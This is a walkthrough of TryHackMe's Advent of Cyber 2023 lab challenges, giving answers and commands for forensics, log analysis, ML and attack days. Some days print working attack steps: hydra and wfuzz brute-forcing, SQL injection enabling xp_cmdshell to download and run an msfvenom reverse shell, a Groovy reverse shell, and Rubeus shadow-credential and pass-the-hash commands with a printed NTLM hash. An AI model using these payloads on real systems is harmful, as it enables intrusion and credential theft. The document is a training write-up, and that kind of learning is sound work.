Tryhackme - Advent of Cyber 2023

Tryhackme – Advent of Cyber 2023

In this walk through, we will be going through the Advent of Cyber 2023 room from Tryhackme. In this room, we will cover the complete writeup of Advent of Cyber 2023 challenges that covers various beginner friendly challenges ranging from Machine learning to Digital Forensics. So, let’s get started without any delay.

Advent of Cyber 2023

Table of Contents

Task 1 – [Introduction] Welcome to Advent of Cyber 2023!

Question 1 – Read the above and check out the prizes!

Task 1 - [Introduction] Welcome to Advent of Cyber 2023!

Task 2 – [Introduction] Rules and a Short Tutorial

Question 1 – Read the rules!

Task 2 - [Introduction] Rules and a Short Tutorial

Task 3 – [Introduction] Follow us on social media!

Task 3 - [Introduction] Follow us on social media!

Task 4 – [Introduction] Join the TryHackMe Community!

Question 1 – Is there a dedicated Advent of Cyber channel on TryHackMe Discord where users can discuss daily challenges and receive dedicated support? (yes/no)

Task 4 - [Introduction] Join the TryHackMe Community!

Task 5 – [Introduction]Subscribing, TryHackMe for Business & Christmas Swag!

Question 1 – Share the annual discount with your friends!

Task 5 - [Introduction]Subscribing, TryHackMe for Business & Christmas Swag!

Task 6 – [Introduction] The Insider Threat Who Stole Christmas

Question 1 – Are you ready to help Elf McSkidy tackle Advent of Cyber 2023? Come back on December 1st, 4pm GMT when the first daily challenge will be released!

Task 6 - [Introduction] The Insider Threat Who Stole Christmas

Task 7 – [Day 1: Machine Learning] Chatbot, tell me, if you’re really safe?

Question 1 – What is McGreedy’s personal email address?

Van Chatty chatbot

Mcgreedy email

Question 2 – What is the password for the IT server room door?

password for the IT server room door

Question 3 – What is the name of McGreedy’s secret project?

McGreedt Secret project

Question 4 – If you enjoyed this room, we invite you to join our Discord server for ongoing support, exclusive tips, and a community of peers to enhance your Advent of Cyber experience!

Task 7 - [Day 1: Machine Learning] Chatbot, tell me, if you're really safe?

Task 8 – [Day 2: Log Analysis] O Data, All Ye Faithful

Question 1 – Open the notebook “Workbook” located in the directory “4_Capstone” on the VM. Use what you have learned today to analyse the packet capture.

Workbook.ipynb

Question 2 – How many packets were captured (looking at the PacketNumber)?

Required code

Question 3 – What IP address sent the most amount of traffic during the packet capture?

Required code

Question 4 – What was the most frequent protocol?

Required code

Question 5 – If you enjoyed today’s task, check out the Intro to Log Analysis room.

Task 8 - [Day 2: Log Analysis] O Data, All Ye Faithful

Task 9 – [Day 3: Brute Forcing] Hydra is Coming to Town

Question 1 – Using crunch and hydra, find the PIN code to access the control system and unlock the door. What is the flag?

Control system login

crunch 3 3 0123456789ABCDEF -o wordlist.txt

crunch password list

hydra -l '' -P wordlist.txt -f -v 10.10.112.55 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000

hydra brutetforce

password

PIN password

AC Temperature

Flag

Question 2 – If you have enjoyed this room please check out the Password Attacks room.

Task 9 - [Day 3: Brute Forcing] Hydra is Coming to Town

Task 10 – [Day 4: Brute Forcing] Baby, it’s CeWLd outside

Question 1 – What is the correct username and password combination? Format username:password

AntarctiCrafts

  • Generated the password list using cewl.

cewl.rb -d 2 -m 5 -w passwords.txt http://10.10.12.161 --with-numbers

passwords.txt

  • Generated the usernames list using cewl.

cewl.rb -d 0 -m 5 -w usernames.txt http://10.10.12.161/team.php --lowercase

usernames.txt

  • Bruteforce the login password using the generated list and wfuzz.

wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.12.161/login.php -d "username=FUZZ&password=FUZ2Z"

wfuzz fuzzing

Question 2 – What is the flag?

Login Panel

Webmail

Flag

Question 3 – If you enjoyed this task, feel free to check out the Web Enumeration room.

Task 10 - [Day 4: Brute Forcing] Baby, it's CeWLd outside

Task 11 – [Day 5: Reverse engineering] A Christmas DOScovery: Tapes of Yule-tide Past

Question 1 – How large (in bytes) is the AC2023.BAK file?

Creedster

dir

C dir

Question 2 – What is the name of the backup program?

cd Tools/Backup
type readme.txt

Backup

Question 3 – What should the correct bytes be in the backup’s file signature to restore the backup properly?

EDIT C:\AC2023.BAK

AC2023.BAK

  • As per the output of readme.txt above, the first byte of the file signature should be “41 43” which is equivalent to “AC” in ASCII.

Hex to ASCII Text String Converter

Question 4 – What is the flag after restoring the backup successfully?

AC2023.BAK

BUMASTER.EXE C:\AC2023.BAK

Flag

Question 5 – What you’ve done is a simple form of reverse engineering, but the topic has more than just this. If you are interested in learning more, we recommend checking out our x64 Assembly Crash Course room, which offers a comprehensive guide to reverse engineering at the lowest level.

Task 11 - [Day 5: Reverse engineering] A Christmas DOScovery: Tapes of Yule-tide Past

Task 12 – [Day 6: Memory corruption] Memories of Christmas Past

Question 1 – If the coins variable had the in-memory value in the image below, how many coins would you have in the game?

Memory image

  • Used the below online converter to convert the hex codes to decimal value. Input the hex codes in Little Endian format.

Hexadecimal Convertor – https://www.rapidtables.com/convert/number/hex-to-decimal.html

Hexadecimal Converter

Question 2 – What is the value of the final flag?

Tree Builder 2023

Enter new name

Getting coins

Shooting star

Question 3 – We have only explored the surface of buffer overflows in this task. Buffer overflows are the basis of many public exploits and can even be used to gain complete control of a machine. If you want to explore this subject more in-depth, feel free to check the Buffer Overflows room.

Question 4 –  Van Jolly still thinks the Ghost of Christmas Past is in the game. She says she has seen it with her own eyes! She thinks the Ghost is hiding in a glitch, whatever that means. What could she have seen?

Task 12 - [Day 6: Memory corruption] Memories of Christmas Past

Task 13 – [Day 7: Log analysis] ‘Tis the season for log chopping!

Question 1 – How many unique IP addresses are connected to the proxy server?

cut -d ' ' -f2 access.log | sort | uniq

IP address

Question 2 – How many unique domains were accessed by all workstations?

cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq | nl

domains

domains

Question 3 – What status code is generated by the HTTP requests to the least accessed domain?

cut -d ' ' -f3,6 access.log | sort | uniq -c | sort -n

frostlings.bigbadstash.thm

Question 4 – Based on the high count of connection attempts, what is the name of the suspicious domain?

cut -d ' ' -f3,6 access.log | sort | uniq -c | sort -nr

frostlings.bigbadstash.thm

Question 5 – What is the source IP of the workstation that accessed the malicious domain?

grep frostlings.bigbadstash.thm access.log | head -n 5

grep frostlings.bigbadstash.thm

Question 6 – How many requests were made on the malicious domain in total?

 cut -d ' ' -f3,6 access.log | sort | uniq -c | sort -nr | grep frostlings.bigbadstash.thm

grep frostlings.bigbadstash.thm

Question 6 – Having retrieved the exfiltrated data, what is the hidden flag?

grep frostlings.bigbadstash.thm access.log | cut -d ' ' -f5 | cut -d '=' -f2 | base64 -d

access.log

Flag

Question 7 – If you enjoyed doing log analysis, check out the Log Analysis module in the SOC Level 2 Path.

Task 13 - [Day 7: Log analysis] ‘Tis the season for log chopping!

Task 14 – [Day 8: Disk Forensics] Have a Holly, Jolly Byte!

Question 1 – What is the malware C2 server?

  • Looked inside DO NOT OPEN -> secretchat.txt file.

AccessData FTK Imager

Evidence Tree

secretchat.txt

Question 2 – What is the file inside the deleted zip archive?

  • Looked inside the JuicyTomaTOY.zip directory.

JuicyTomaTOY.exe

Question 4 – What flag is hidden in one of the deleted PNG files?

potrait.png

Find Hex

Flag

Question 4 – What is the SHA1 hash of the physical drive and forensic image?

AccessData FTK Imager

PHYSICAL DRIVE 2

Disk/Image Verify Results

Question 5 – If you liked today’s challenge, the Digital Forensics Case B4DM755 room is an excellent overview of the entire digital forensics and incident response (DFIR) process!

Task 14 - [Day 8: Disk Forensics] Have a Holly, Jolly Byte!

Task 15 – [Day 9: Malware Analysis] She sells C# shells by the C2shore

Question 1 – What HTTP User-Agent was used by the malware for its connection requests to the C2 server?

JuicyTomaTOY_defanged

JuicyTomatoy

HTTP User-Agent

Question 2 – What is the HTTP method used to submit the command execution output?

Question 3 – What key is used by the malware to encrypt or decrypt the C2 data?

malware key

Question 4 – What is the first HTTP URL used by the malware?

 first HTTP URL

Question 5 – How many seconds is the hardcoded value used by the sleep function?

Question 6 – What is the C2 command the attacker uses to execute commands via cmd.exe?

Question 7 – What is the domain used by the malware to download another binary?

domain used by the malware

Question 8 – Check out the Malware Analysis module in the SOC Level 2 Path if you enjoyed analysing malware.

Task 15 - [Day 9: Malware Analysis] She sells C# shells by the C2shore

Task 16 – [Day 10: SQL Injection ] Inject the Halls with EXEC Queries

Question 1 – Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?

Gift Search

Question 2 – Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?

http://10.10.88.66/giftresults.php?age=child%27&budget=0

Gift Search Results

Question 3 – Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?

http://10.10.88.66/giftresults.php?age=child' OR 1=1--

THM flag

Question 4 – What flag is in the note file Gr33dstr left behind on the system?

http://10.10.88.66/giftresults.php?age='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f exe -o reverse.exe

msfvenom payload

python3 -m http.server

python HTTP server

nc -lvnp 4444

netcat listener

http://10.10.88.66/giftresults.php?age='; EXEC xp_cmdshell 'certutil -urlcache -f http://10.18.1.78:8000/reverse.exe C:\Windows\Temp\reverse.exe'; --

http://10.10.88.66/giftresults.php?age='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe'; --

netcat listener

type Note.txt

Question 5 – What is the flag you receive on the homepage after restoring the website?

restore_website.bat

Task 16 - [Day 10: SQL Injection ] Inject the Halls with EXEC Queries

Question 6 – If you enjoyed this task, feel free to check out the Software Security module.

Tryhackme - Advent of Cyber 2023

Task 17 – [Day 11: Active Directory] Jingle Bells, Shadow Spells

Question 1 – What is the hash of the vulnerable user?

Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

Powerview.ps1

 .\Whisker.exe add /target:vansprinkles

Whisker.exe

Rubeus.exe asktgt /user:vansprinkles /certificate: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 /password:"STPvl7jzuCvhljw5" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show

Rubeus.exe

NTLM hash

NTLM hash: 03E805D8A8C5AA435FB48832DAD620E3

Question 2 – What is the content of flag.txt on the Administrator Desktop?

evil-winrm.rb -i 10.10.225.102 -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3

evil-winrm shell

cat flag.txt

Question 3 – If you enjoyed this task, feel free to check out the Compromising Active Directory module!

Question 4 – Van Sprinkles left some stuff around the DC. It’s like a secret message waiting to be unravelled!

Task 17 - [Day 11: Active Directory] Jingle Bells, Shadow Spells

Task 18 – [Day 12: Defence in Depth] Sleighing Threats, One Layer at a Time

Question 1 – What is the default port for Jenkins?

Jenkins Dashboard

Question 2 – What is the password of the user tracy?

  • Used the below groovy reverse shell to get a connection back at my netcat listener.

String host="10.18.1.78";
int port=6996;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Script Console

netcat listener

  • Looked inside the backup.sh script in /opt/scripts directory and found the tracy’s password.

cat backup.sh

Question 3 – What’s the root flag?

  • With the found password, switched user to tracy.

su tracy

su tracy

  • Next, checked the sudo permissions for user tracy where we found out that she can run all commands as sudo.

sudo -l

sudo -l

  • Switched user to root and captured the root flag.

sudo su

sudo su

cat flag.txt

Question 4 – What is the error message when you login as tracy again and try sudo -l after its removal from the sudoers group?

sudo deluser tracy sudo

root

sudo -l

Question 5 – What’s the SSH flag?

cat /etc/ssh/sshd_config

sshd_config

Question 6 – What’s the Jenkins flag?

cat config.xml.bak

cat config.xml.bak

Question 7 – If you enjoyed this room, please check out our SOC Level 1 learning path.

Task 18 - [Day 12: Defence in Depth] Sleighing Threats, One Layer at a Time

Task 19 – [Day 13: Intrusion Detection] To the Pots, Through the Walls

Question 1 – Which security model is being used to analyse the breach and defence strategies?

Question 2 – Which defence capability is used to actively search for signs of malicious activity?

Question 3 – What are our main two infrastructure focuses? (Answer format: answer1 and answer2)

Question 4 – Which firewall command is used to block traffic?

Question 5 – There is a flag in one of the stories. Can you find it?

ssh login

chmod 777 Van_Twinkle_rules.sh

cat Van_Twinkle_rules.sh

cat nano Van_Twinkle_rules.sh

nano Van_Twinkle_rules.sh

nano Van_Twinkle_rules.sh

./Van_Twinkle_rules.sh

Van_Twinkle_rules.sh

sudo ufw status verbose

ufw status

  • Accessed the website on port 8090.

Best Festival Company

  • Found the flag in “Santa’s Challenge” post.

Flag

Question 6 – If you enjoyed this task, feel free to check out the Network Device Hardening room.

Task 19 - [Day 13: Intrusion Detection] To the Pots, Through the Walls

Task 20 – [Day 14: Machine Learning] The Little Machine That Wanted to Learn

Question 1 – What is the other term given for Artificial Intelligence or the subset of AI meant to teach computers how humans think or nature works?

Question 2 – What ML structure aims to mimic the process of natural selection and evolution?

Question 3 – What is the name of the learning style that makes use of labelled data to train an ML structure?

Question 4 – What is the name of the layer between the Input and Output layers of a Neural Network?

Question 5 – What is the name of the process used to provide feedback to the Neural Network on how close its prediction was?

Question 6 – What is the value of the flag you received after achieving more than 90% accuracy on your submitted predictions?

detector.py

#These are the imports that we need for our Neural Network
#Numpy is a powerful array and matrix library used to format our data
import numpy as np
#Pandas is a machine learning library that also allows for reading and formatting data structures
import pandas as pd
#This will be used to split our data
from sklearn.model_selection import train_test_split
#This is used to normalize our data
from sklearn.preprocessing import StandardScaler
#This is used to encode our text data to integers
from sklearn.preprocessing import LabelEncoder
#This is our Multi-Layer Perceptron Neural Network
from sklearn.neural_network import MLPClassifier

#These are the colour labels that we will convert to int
colours = ["Red", "Blue", "Green", "Yellow", "Pink", "Purple", "Orange"]


#Read the training and testing data files
training_data = pd.read_csv("training_dataset.csv")
training_data.head()

testing_data = pd.read_csv("testing_dataset.csv")
testing_data.head()

#The Neural Network cannot take Strings as input, therefore we will encode the strings as integers
encoder = LabelEncoder()
encoder.fit(training_data["Colour Scheme"])
training_data["Colour Scheme"] = encoder.transform(training_data["Colour Scheme"])
testing_data["Colour Scheme"] = encoder.transform(testing_data["Colour Scheme"])



#Read our training data from the CSV file.
#First we read the data we will train on
X = np.asanyarray(training_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']])
#Now we read the labels of our training data
y = np.asanyarray(training_data['Defective'].astype('int'))

#Read our testing data
test_X = np.asanyarray(testing_data[['Height','Width','Length','Colour Scheme','Maker Elf ID','Checker Elf ID']])


###### INSERT DATASET SPLIT CODE HERE ######
#Now we need to split our training dataset here

train_X, validate_X, train_y, validate_y = train_test_split(X, y, test_size=0.2)

print ("Sample of our data:")
print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3]))

###### INSERT NORMALISATION CODE HERE ######
#Now we normalize our dataset

scaler = StandardScaler()
scaler.fit(train_X)
 
train_X = scaler.transform(train_X)
validate_X = scaler.transform(validate_X)
test_X = scaler.transform(test_X)


print ("Sampe of our data after normalization:")
print("Features:\n{}\nDefective?:\n{}".format(train_X[:3], train_y[:3]))


##### INSERT CLASSIFIER CODE HERE ######

clf = MLPClassifier(solver='lbfgs', alpha=1e-5,hidden_layer_sizes=(15, 2), max_iter=10000)

print ("Starting to training our Neural Network")

###### INSERT CLASSIFIER TRAINING CODE HERE ######

clf.fit(train_X, train_y)

###### INSERT CLASSIFIER VALIDATION PREDICTION CODE HERE #######


y_predicted = clf.predict(validate_X)

#This function tests how well your Neural Network performs with the validation dataset
count_correct = 0
count_incorrect = 0
for x in range(len(y_predicted)):

    if (y_predicted[x] == validate_y[x]):
        count_correct += 1
    else:
        count_incorrect += 1

print ("Training has been completed, validating neural network now....")
print ("Total Correct:\t\t" + str(count_correct))
print ("Total Incorrect:\t" + str(count_incorrect))

accuracy =  ((count_correct * 1.0) / (1.0 * (count_correct + count_incorrect)))

print ("Network Accuracy:\t" + str(accuracy * 100) + "%")

print ("Now we will predict the testing dataset for which we don't have the answers for...")

###### INSERT CLASSIFIER TESTING PREDICTION CODE HERE ######

y_test_predictions = clf.predict(test_X)

#This function will save your predictions to a textfile that can be uploaded for scoring
print ("Saving predictions to a file")

output = open("predictions.txt", 'w')

for value in y_test_predictions:
    output.write(str(value) + "\n")

print ("Predictions are saved, this file can now be uploaded to verify your Neural Network")
output.close()

python3 detector.py

python3 detector.py

File upload

predictions.txt

Flag

Question 7 – If you enjoyed this room, we invite you to join our Discord server for ongoing support, exclusive tips, and a community of peers to enhance your Advent of Cyber experience!

Task 20 - [Day 14: Machine Learning] The Little Machine That Wanted to Learn

Task 21 – [Day 15: Machine Learning] Jingle Bell SPAM: Machine Learning Saves the Day!

Question 1 – What is the key first step in the Machine Learning pipeline?

Question 2 – Which data preprocessing feature is used to create new features or modify existing ones to improve model performance?

Question 3 – During the data splitting step, 20% of the dataset was split for testing. What is the percentage weightage avg of precision of spam detection?

Expected Output

Question 4 – How many of the test emails are marked as spam?

Data

Question 4 – One of the emails that is detected as spam contains a secret code. What is the code?

Results

Messages

Question 5 – If you enjoyed this room, please check out the Phishing module.

Task 21 - [Day 15: Machine Learning] Jingle Bell SPAM: Machine Learning Saves the Day!

Task 22 – [Day 16: Machine Learning] Can’t CAPTCHA this Machine!

Question 1 – What key process of training a neural network is taken care of by using a CNN?

Question 2 – What is the name of the process used in the CNN to extract the features?

Question 3 – What is the name of the process used to reduce the features down?

Question 4 – What off-the-shelf CNN did we use to train a CAPTCHA-cracking OCR model?

Question 5 – What is the password that McGreedy set on the HQ Admin portal?

hqadmin.thm

docker run -d -v /tmp/data:/tempdir/ aocr/full
docker ps
docker exec -it CONTAINER_ID /bin/bash
cd /ocr/
curl http://hqadmin.thm:8000/
ls -alh raw_data/dataset/
cat labels/training.txt
aocr dataset ./labels/training.txt ./training.tfrecords
cd labels && aocr train training.tfrecords
cd /ocr/ && cp -r model /tempdir/
docker kill CONTAINER_ID
docker run -t --rm -p 8501:8501 -v /tmp/data/model/exported-model:/models/ -e MODEL_NAME=ocr tensorflow/serving

python3 bruteforce.py

python3 bruteforce.py

Password

Question 6 – What is the value of the flag that you receive when you successfully authenticate to the HQ Admin portal?

Login panel

Access Granted

Question 7 – If you enjoyed this room, check out our Red Teaming learning path!

Task 22 - [Day 16: Machine Learning] Can't CAPTCHA this Machine!

Task 23 – [Day 17: Traffic Analysis] I Tawt I Taw A C2 Tat!

Question 1 – Which version of SiLK is installed on the VM?

silk_config -v

silk_config

Question 2 – What is the size of the flows in the count records?

rwfileinfo suspicious-flows.silk

rwfileinfo

Question 3 – What is the start time (sTime) of the sixth record in the file?

rwcut suspicious-flows.silk --num-recs=6

rwcut

Question 4 – What is the destination port of the sixth UDP record?

rwfilter suspicious-flows.silk --proto=17 --pass=stdout | rwcut --fields=protocol,sIP,sPort,dIP,dPort --num-recs=6

rwfilter

Question 5 – What is the record value (%) of the dport 53?

rwstats suspicious-flows.silk --fields=dPort --values=records,packets,bytes,sIP-Distinct,dIP-Distinct --count=10

rwstats

Question 6 – What is the number of bytes transmitted by the top talker on the network?

rwstats suspicious-flows.silk --fields=sIP --values=bytes --count=10 --top

rwstats

Question 7 – What is the sTime value of the first DNS record going to port 53?

rwfilter suspicious-flows.silk --dport=53 --pass=stdout | rwcut --fields=sIP,dIP,stime | head -10

rwfilter

Question 8 – What is the IP address of the host that the C2 potentially controls? (In defanged format: 123[.]456[.]789[.]0 )

rwfilter suspicious-flows.silk --aport=53 --pass=stdout | rwstats --fields=sIP,dIP,dPort --count=10

rwfilter

rwfilter suspicious-flows.silk --any-address=175.175.173.221 --pass=stdout | rwstats --fields=sIP,dIP --count=10

rwfilter

Question 9 – Which IP address is suspected to be the flood attacker? (In defanged format: 123[.]456[.]789[.]0 )

rwfilter suspicious-flows.silk --aport=80 --pass=stdout | rwstats --fields=sIP,dIP,dPort --count=10

rwfilter

Question 10 – What is the sent SYN packet’s number of records?

 rwfilter suspicious-flows.silk --any-address=175.215.236.223 --pass=stdout | rwstats --fields=sIP,dIP --count=10

rwfilter

Question 11 – We’ve successfully analysed network flows to gain quick statistics. If you want to delve deeper into network packets and network data, you can look at the Network Security and Traffic Analysis module.

Task 23 - [Day 17: Traffic Analysis] I Tawt I Taw A C2 Tat!

Task 23 - [Day 17: Traffic Analysis] I Tawt I Taw A C2 Tat!

Task 24 – [Day 18: Eradication] A Gift That Keeps on Giving

Question 1 – What is the name of the service that respawns the process after killing it?

top

top

systemctl list-unit-files | grep enabled

systemctl list-unit-files

Question 2 – What is the path from where the process and service were running?

cd /proc/[whatever PID a process is running]

sudo ls -la exe

sudo ls -la exe

Question 3 – The malware prints a taunting message. When is the message shown? Choose from the options below.

  1. Randomly
  2. After a set interval
  3. On process termination
  4. None of the above

Question 4 – If you enjoyed this task, feel free to check out the Linux Forensics room.

Task 25 - [Day 19: Memory Forensics] CrypTOYminers Sing Volala-lala-latility

Task 25 – [Day 19: Memory Forensics] CrypTOYminers Sing Volala-lala-latility

Question 1 – What is the exposed password that we find from the bash history output?

cp Ubuntu_5.4.0-163-generic_profile.zip ~/.local/lib/python2.7/site-packages/volatility/plugins/overlays/linux

vol.py --info | grep Ubuntu

Tryhackme - Advent of Cyber 2023

vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_bash

Tryhackme - Advent of Cyber 2023

Question 2 – What is the PID of the miner process that we find?

vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_pslist

Tryhackme - Advent of Cyber 2023

Question 3 – What is the MD5 hash of the miner process?

mkdir extracted

vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_procdump -D extracted -p 10280

Tryhackme - Advent of Cyber 2023

ls extracted/

md5sum extracted/miner.10280.0x400000

Tryhackme - Advent of Cyber 2023

Question 4 – What is the MD5 hash of the mysqlserver process?

vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_procdump -D extracted -p 10280

md5sum extracted/mysqlserver.10291.0x400000

Tryhackme - Advent of Cyber 2023

Question 5 – Use the command strings extracted/miner.<PID from question 2>.0x400000 | grep http://. What is the suspicious URL? (Fully defang the URL using CyberChef)

strings extracted/miner.10280.0x400000 | grep http://

Tryhackme - Advent of Cyber 2023

Tryhackme - Advent of Cyber 2023

Question 6 – After reading the elfie file, what location is the mysqlserver process dropped in on the file system?

vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_find_file -i 0xffff9ce9b78280e8 -O extracted/elfie

ls extracted/

cat extracted/elfie

Tryhackme - Advent of Cyber 2023

Question 7 – If you enjoyed this task, feel free to check out the Volatility room.

Tryhackme - Advent of Cyber 2023

Task 26 – [Day 20: DevSecOps] Advent of Frostlings

Question 1 – What is the handle of the developer responsible for the merge changes?

Frostlino

Question 2 – What port is the defaced calendar site server running on?

Passed jobs

Testing

Ip and Port

Frostlings Rule

Question 3 – What server is the malicious server running on?

Commits

Update gitlab-ci.yaml

Question 4 – What message did the Frostlings leave on the defaced site?

Question 5 – What is the commit ID of the original code for the Advent Calendar site?

gitlab-ci.yaml

Question 6 – If you enjoyed today’s challenge, please check out the Source Code Security room.

